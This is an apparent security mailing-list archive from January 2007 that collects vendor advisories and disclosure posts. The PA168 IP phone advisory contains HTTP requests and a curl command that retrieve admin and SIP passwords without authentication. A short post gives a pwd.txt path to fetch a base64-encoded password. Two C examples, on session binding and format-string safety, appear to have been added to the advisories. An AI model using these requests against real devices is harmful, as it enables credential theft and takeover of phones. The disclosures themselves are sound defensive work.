 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5619
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5749
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5754
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6106
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 c807857c820dae84bad9beac5ff132c2  
corporate/3.0/i586/kernel-2.6.3.36mdk-1-1mdk.i586.rpm
 9502a05c5049f394b50a4f2128ca7311  
corporate/3.0/i586/kernel-BOOT-2.6.3.36mdk-1-1mdk.i586.rpm
 26b4a92d5ed2c1953fb88fd304584281  
corporate/3.0/i586/kernel-doc-2.6.3-36mdk.i586.rpm
 c2f4619bf4b4d9d3952ccad7eb4be16d  
corporate/3.0/i586/kernel-enterprise-2.6.3.36mdk-1-1mdk.i586.rpm
 20970c40ded39599c4ad6bc976447c8c  
corporate/3.0/i586/kernel-i686-up-4GB-2.6.3.36mdk-1-1mdk.i586.rpm
 5856cd990d971667d673216603cc9b1f  
corporate/3.0/i586/kernel-p3-smp-64GB-2.6.3.36mdk-1-1mdk.i586.rpm
 0e978fa73922d870b487c2f8d14eaff3  
corporate/3.0/i586/kernel-secure-2.6.3.36mdk-1-1mdk.i586.rpm
 fa9f0cdd42385ec68aa79198d2615617  

Re: Multiple SQL injections and XSS in FishCart 3.1

2007-01-23 Thread michael
I am the principal behind FishCart, discussed in the above advisory.  I found 
tonight after posting to bugtraq about another reported problem that this 
previous bug is reported as unpatched.

As best we could determine the post from dcrab was not accurate regarding the 
SQL injection claims.  The original post at 
http://www.securityfocus.com/archive/1/397484 shows invalid sql statements, not 
sql injection.  We found that the URL he had posted was not normal and turned 
up a coding bug that explained the SQL errors, but there was no SQL injection.  
We also had some trouble reproducing some of the XSS errors.  That said, we 
took the claims seriously and immediately went to work to improve error 
hardening.

A fix was worked out among the developers and incorporated into the source in 
mid May 2005.  A version 3.x patch was derived from the source changes and sent 
to the FishCart mailing list on May 21, 2005 for installed FishCarts.  This 
post can be seen at http://www.fishcart.org/archives/200505/msg00028.html.  You 
will need to log in with username 'speak', password 'friend' to see the post.  
While we have continued to refine the process, we think it fair that the patch 
has been available since that date.

Please update your advisory to reflect this information.  If you have any 
further questions please feel free to contact me at your convenience to verify 
my identity or for further details on the fixes.  Thank you for your attention 
to this matter.

   Michael Brennen
   President, FishNet, Inc.
   [EMAIL PROTECTED]
   972.669.0041


Re: DoS against AVM Fritz!Box 7050 (and others)

2007-01-23 Thread Matthias Wenzel
A new FW version with the fix is released:

ftp://ftp.avm.de/fritz.box/fritzbox.fon_wlan_7050/firmware/

Matthias

[EMAIL PROTECTED] wrote:
 Denial of Service against AVM Fritz!Box 7050 (and others)
 
 Discovered by: Matthias Wenzel
 Advisory: http://mazzoo.de/blog/2007/01/18#FritzBox_DoS
 
 Manufacturer: AVM (www.avm.de)
 Product: Fritz!Box 750 (and others)
 
 Vendor was notified 6 months ago (see blog entry by Matthias)
 
 Sending a zero-length UDP packet to port 5060 (SIP) of an AVM Fritz!Box will
 crash the VoIP-telephony application. This works from any IP-interface,
 including the DSL line.
 
 
 Collin (only delivering the message to FD and BugTraq)
 
 
 



[ GLSA 200701-18 ] xine-ui: Format string vulnerabilities

2007-01-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: xine-ui: Format string vulnerabilities
  Date: January 23, 2007
  Bugs: #161558
ID: 200701-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

xine-ui improperly handles format strings, possibly allowing for the
execution of arbitrary code.

Background
==

xine-ui is a skin-based user interface for xine. xine is a free
multimedia player. It plays CDs, DVDs, and VCDs, and can also decode
other common multimedia formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /   Vulnerable   /                     Unaffected
    -------------------------------------------------------------------
  1  xine-ui          < 0.99.5_pre20060716           >= 0.99.5_pre20060716

Description
===

Due to the improper handling and use of format strings, the
errors_create_window() function in errors.c does not safely write data
to memory.

Impact
==

An attacker could entice a user to open a specially crafted media file
with xine-ui, and possibly execute arbitrary code.

Workaround
==

There is no known workaround at this time.

Resolution
==

All xine-ui users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/xine-ui-0.99.5_pre20060716"

References
==

  [ 1 ] CVE-2007-0254
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0254

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




[ MDKSA-2006:217-2 ] - Updated proftpd packages fix vulnerabilities

2007-01-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2006:217-2
 http://www.mandriva.com/security/
 ___
 
 Package : proftpd
 Date: January 23, 2007
 Affected: Corporate 3.0
 ___
 
 Problem Description:
 
 A stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0
 and earlier, allows remote attackers to cause a denial of service, as
 demonstrated by vd_proftpd.pm, a ProFTPD remote exploit.
 (CVE-2006-5815)

 Buffer overflow in the tls_x509_name_oneline function in the mod_tls
 module, as used in ProFTPD 1.3.0a and earlier, and possibly other
 products, allows remote attackers to execute arbitrary code via a large
 data length argument, a different vulnerability than CVE-2006-5815.
 (CVE-2006-6170)

 ProFTPD 1.3.0a and earlier does not properly set the buffer size limit
 when CommandBufferSize is specified in the configuration file, which
 leads to an off-by-two buffer underflow.  NOTE: in November 2006, the
 role of CommandBufferSize was originally associated with CVE-2006-5815,
 but this was an error stemming from an initial vague disclosure. NOTE:
 ProFTPD developers dispute this issue, saying that the relevant memory
 location is overwritten by assignment before further use within the
 affected function, so this is not a vulnerability. (CVE-2006-6171)

 Packages have been patched to correct these issues.

 Update:

 The update for the Corporate 3.0 platforms had a bad patch for
 CVE-2006-5815, which prevented some clients from being able to use the
 server. This update corrects this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5815
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6170
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



RANDOM PHP QUOTE 1.0 (pwd.txt) Remote Password Disclosure

2007-01-23 Thread the . tiger100
#
#RANDOM PHP QUOTE 1.0 (pwd.txt) Remote Password Disclosure
#
#
#script : 
http://www.scriptsez.net/download/download.php?action=download&p=random_php_quote.zip&ns=1
#
#
#discovered by : ThE TiGeR 100
#
#
#Exploit : 
#
#http://www.site.com/[path]/pwd.txt
#or
#http://www.site.com/pwd.txt 
#
#then crack the password with base64 decode 
#
#
#Contact:[EMAIL PROTECTED]
#
#
#GreetZ to str0k ;)
#
# Your Time is UpMy Time Is Now,
# You Can't See Me My Time Is Now
#


[ GLSA 200701-19 ] OpenLDAP: Insecure usage of /tmp during installation

2007-01-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: OpenLDAP: Insecure usage of /tmp during installation
  Date: January 23, 2007
  Bugs: #159508
ID: 200701-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A shell script commonly released with OpenLDAP makes insecure usage of
files in /tmp during the emerge process.

Background
==

OpenLDAP Software is an open source implementation of the Lightweight
Directory Access Protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /   Vulnerable   /                   Unaffected
    -------------------------------------------------------------------
  1  net-nds/openldap       < 2.1.30-r10                   >= 2.1.30-r10
                                                           >= 2.2.28-r7
                                                           >= 2.3.30-r2
     net-nds/openldap        < 2.2.28-r7                   >= 2.1.30-r10
                                                           >= 2.2.28-r7
                                                           >= 2.3.30-r2
     net-nds/openldap        < 2.3.30-r2                   >= 2.1.30-r10
                                                           >= 2.2.28-r7
                                                           >= 2.3.30-r2

Description
===

Tavis Ormandy of the Gentoo Linux Security Team has discovered that the
file gencert.sh distributed with the Gentoo ebuild for OpenLDAP does
not exit when a directory already exists in /tmp during installation,
allowing for directory traversal.

Impact
==

A local attacker could create a symbolic link in /tmp and potentially
overwrite arbitrary system files upon a privileged user emerging
OpenLDAP.

Workaround
==

There is no known workaround at this time.

Resolution
==

All OpenLDAP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose net-nds/openldap

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-19.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability

2007-01-23 Thread ProCheckUp Research

PR06-14: IP Phones based on Centrality Communications/Aredfox PA168
chipset weak session management vulnerability

This advisory has been published following consultation with UK NISCC
[http://www.niscc.gov.uk/]

Date Found: 3rd November 2006

Date Public: 22nd January 2007

Vulnerable:

Phones confirmed to be vulnerable:

- ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54
- SOYO G668 Ethernet IP Phone running SIP firmware version v1.42

The following vendors/models also use the same PA168 chipset/firmware
and are therefore most likely to be vulnerable to the same issue:

- AriaVoice
- AT-323 from ATcom
- JR168_100B from IPLink
- JR168_100W from IPLink
- JR168_200 from IPLink
- Netweb-401/402 from NetWebGroup
- OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based
- Vida some phones PA168 based
- Wuchuan HOP-1001/1002/1003
- Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150
(PA168S chipset)
- GNET some phones PA168x based
- KE1020 Netphone (Meritline)
- ML210 Meritline
- Integrated Networks IN-1002. Found on eBay.
- ArtDio IPF-2000 and IPF-2002L phones
- Perfectone IP300

Severity: Medium

Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp

CVE Candidate: Not assigned

Overview:

There is a problem with the way IP Phones using the PA168 chipset handle
authenticated sessions, allowing remote attackers to gain access to the
admin web console running as superuser.

Description:
When the superuser account authenticates to the admin web console, a
request such as the following is sent to the IP phone's web server:

POST /a HTTP/1.1
Referer: http://192.168.1.100/
Host: 192.168.1.100
Content-Length: 31

auth=12345678&login=+++Login+++

At this point, the superuser session is considered *active* by the web
server. All it takes for attackers to perform an administrative task at
this point is to send a well-formed request to the web server. Since no
authentication token or password is submitted within the HTTP requests,
anyone can perform administrative tasks while the session is active.
Even if the attacker sends the administrative requests from an IP
address different from the one used by the superuser account, the IP
Phone's web server accepts them as long as the superuser's session is
still active.

A script called active-session-attack.sh has been created, which
remotely checks repeatedly until a superuser account has logged on by
sending a forged superuser request every five seconds. As soon as the
superuser session becomes active, the following information will be
obtained from the settings page, and emailed to the attacker:

- IP phone's superuser password - grants administrative access
- IP phone's user password - grants restricted access
- SIP gateway hostname/IP address
- SIP account username
- SIP account PIN number

REQUEST:

POST /g HTTP/1.1
Host: 192.168.1.100
Content-Length: 13

back=++Back++


RESPONSE (output has been partially omitted for clarity):

HTTP/1.1 200 OK
Content-Length: 16727
Content-Type: text/html
Connection: close

<TITLE>IP Phone V1.54</TITLE>

[output omitted]

<INPUT name=sipproxy value=sip.test.com>
<INPUT name=domain value=sip.test.com>
<INPUT name=account value=myaccount size=24 maxlength=32>
<INPUT name=pin type=password value=1234>
<INPUT name=superpassword type=password value=12345678>
<INPUT name=password type=password value=1234>

[output omitted]


In order to test this vulnerability, the following steps have been provided:

1. Log into http://192.168.1.100 from computer A using the superuser
password ('12345678' by default)

2. Send the following curl command from computer B:

curl -d back=++Back++ http://192.168.1.100/g

3. The administrative settings page should be returned without any
password required.

Note: the IP phone's web server is enabled by default

Fix:

Use access control lists on routers or firewalls in order to only allow
trusted IP addresses to access ATCOM AT-320ED IP Phone's web server.
Exposing the PA168-based IP Phone's admin web server on the Internet is
not recommended.
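
The root cause is a single global "session active" flag with no binding to the client that logged in. As an added example that is neither ProCheckUp's active-session-attack.sh nor PA168 firmware code, here is a minimal C model of the web console's authorization decision: pa168_style_allow() reproduces the behaviour the advisory describes, and bound_session_allow() is a hardened form that ties the session to a secret token, the authenticating address and an expiry. The struct layouts, function names, sample addresses and token are all constructed for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TOKEN_LEN 32

/* Server-side record of the superuser's session (hypothetical layout). */
struct session {
    bool     active;
    uint32_t client_ip;            /* address that authenticated via POST /a */
    uint32_t expires;              /* unix time; 0 means never */
    char     token[TOKEN_LEN + 1]; /* secret issued at login, returned by the client */
};

/* What the server knows about one incoming administrative request. */
struct request {
    uint32_t    src_ip;
    const char *token;             /* cookie/form field; NULL when absent */
    uint32_t    now;
};

/* Model of the behaviour in the advisory: the server only remembers that
 * "someone is logged in"; sender address and credentials are never examined. */
bool pa168_style_allow(const struct session *s, const struct request *r)
{
    (void)r;
    return s->active;
}

/* Constant-time compare so a wrong token is rejected without leaking how
 * many leading bytes matched. Both strings must be TOKEN_LEN bytes long. */
static bool token_equal(const char *a, const char *b)
{
    unsigned char diff = 0;
    for (size_t i = 0; i < TOKEN_LEN; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Hardened form: a request is honoured only if it carries the session's
 * secret token, comes from the address that logged in, and is not expired. */
bool bound_session_allow(const struct session *s, const struct request *r)
{
    if (!s->active || r->token == NULL)
        return false;
    if (strlen(r->token) != TOKEN_LEN)        /* malformed token: reject early */
        return false;
    if (s->expires != 0 && r->now >= s->expires)
        return false;
    if (r->src_ip != s->client_ip)            /* the cross-host case from the advisory */
        return false;
    return token_equal(r->token, s->token);
}

int main(void)
{
    /* Constructed values: computer A (192.168.1.101) logged in; computer B
     * (192.168.1.102) replays the bare "back=++Back++" request with no token. */
    struct session s = { true, 0xC0A80165u, 0, "0123456789abcdef0123456789abcdef" };
    struct request from_b = { 0xC0A80166u, NULL, 1000 };
    struct request from_a = { 0xC0A80165u, "0123456789abcdef0123456789abcdef", 1000 };
    printf("PA168-style, request from B: %s\n", pa168_style_allow(&s, &from_b) ? "allowed" : "denied");
    printf("bound session, request from B: %s\n", bound_session_allow(&s, &from_b) ? "allowed" : "denied");
    printf("bound session, request from A: %s\n", bound_session_allow(&s, &from_a) ? "allowed" : "denied");
    return 0;
}
```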

References:

http://www.voip-info.org/wiki/view/PA168
http://www.centralitycomm.com/
http://www.aredfox.com/eindex.htm
http://www.atcom.cn/En_products_At320ED.html
http://www.soyogroup.com/products/proddesc.php?id=307
http://www.procheckup.com/Vulner_2007.php

Legal:

Copyright 2006 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL
[http://www.procheckup.com/Vulner_PR0614.php], and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party.

ProCheckUp is not responsible for the content of external Internet sites.



SUSE Security Announcement: xine (SUSE-SA:2007:013)

2007-01-23 Thread Thomas Biege

-BEGIN PGP SIGNED MESSAGE-

__

SUSE Security Announcement

Package:xine-ui,xine-lib,xine-extra,xine-devel
Announcement ID:SUSE-SA:2007:013
Date:   Tue, 23 Jan 2007 08:00:00 +
Affected Products:  SUSE LINUX 9.3
SUSE LINUX 10.0
SUSE LINUX 10.1
openSUSE 10.2
SUSE SLED 10
SLE SDK 10
Vulnerability Type: remote code execution
Severity (1-10):4
SUSE Default Package:   no
Cross-References:   CVE-2007-0017

Content of This Advisory:
1) Security Vulnerability Resolved:
 format string bug
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   This update fixes several format string bugs in xine that can be exploited
   remotely, with user assistance, to execute arbitrary code.
   Since SUSE Linux 10.1, format string bugs are no longer exploitable.
   (CVE-2007-0017)
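
   The defect class behind this advisory, and behind GLSA 200701-18 above
   (the errors_create_window() function in xine-ui's errors.c), is untrusted
   text passed as a printf-style format string. The following is an added
   example, not code from xine, SUSE or Gentoo: the unsafe pattern next to
   the fixed call, plus a small audit check for stray directives. Function
   names are hypothetical and the hostile sample string is constructed.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Unsafe pattern (hypothetical name): text taken from the media file is
 * passed AS the format string, so "%x" reads the stack and "%n" writes to
 * memory. Kept only to show the contrast; nothing in this file calls it. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int report_error_unsafe(char *out, size_t outsz, const char *msg_from_file)
{
    return snprintf(out, outsz, msg_from_file);
}
#pragma GCC diagnostic pop

/* Fixed pattern: the format is a constant and the untrusted text is an
 * argument, so every '%' in it is copied literally. Returns what snprintf
 * returns (the full length needed), so callers can detect truncation. */
int report_error_safe(char *out, size_t outsz, const char *msg_from_file)
{
    return snprintf(out, outsz, "Error: %s", msg_from_file);
}

/* Audit helper: does untrusted text contain a conversion directive?
 * "%%" is a literal percent sign and does not count. */
bool has_format_directive(const char *s)
{
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* escaped percent, skip both characters */
            p++;
            continue;
        }
        return true;
    }
    return false;
}

int main(void)
{
    /* Constructed sample of what a hostile file's error text might carry. */
    const char *hostile = "bad stream %x %x %n";
    char buf[128];
    report_error_safe(buf, sizeof buf, hostile);
    printf("%s\n", buf);   /* %x and %n survive as literal text; nothing is dereferenced */
    printf("directives present: %s\n", has_format_directive(hostile) ? "yes" : "no");
    return 0;
}
```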


2) Solution or Work-Around

   No temporary work-around known.

   
3) Special Instructions and Notes

   none


4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   
 

[ GLSA 200701-17 ] libgtop: Privilege escalation

2007-01-23 Thread Matthias Geerdsen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libgtop: Privilege escalation
  Date: January 23, 2007
  Bugs: #162169
ID: 200701-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

libgtop improperly handles filenames, possibly allowing for the
execution of arbitrary code.

Background
==

libgtop facilitates the libgtop_daemon, which is used by GNOME to
obtain information about remote systems.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  gnome-base/libgtop        < 2.14.6                        >= 2.14.6

Description
===

Liu Qishuai discovered that glibtop_get_proc_map_s() in
sysdeps/linux/procmap.c does not properly allocate memory for storing a
filename, allowing certain filenames to cause the buffer to overflow on
the stack.

Impact
==

By tricking a victim into executing an application that uses the
libgtop library (e.g. libgtop_daemon or gnome-system-monitor), a local
attacker could specify a specially crafted filename to be used by
libgtop causing a buffer overflow and possibly execute arbitrary code
with the rights of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libgtop users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=gnome-base/libgtop-2.14.6"

References
==

  [ 1 ] CVE-2007-0235
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


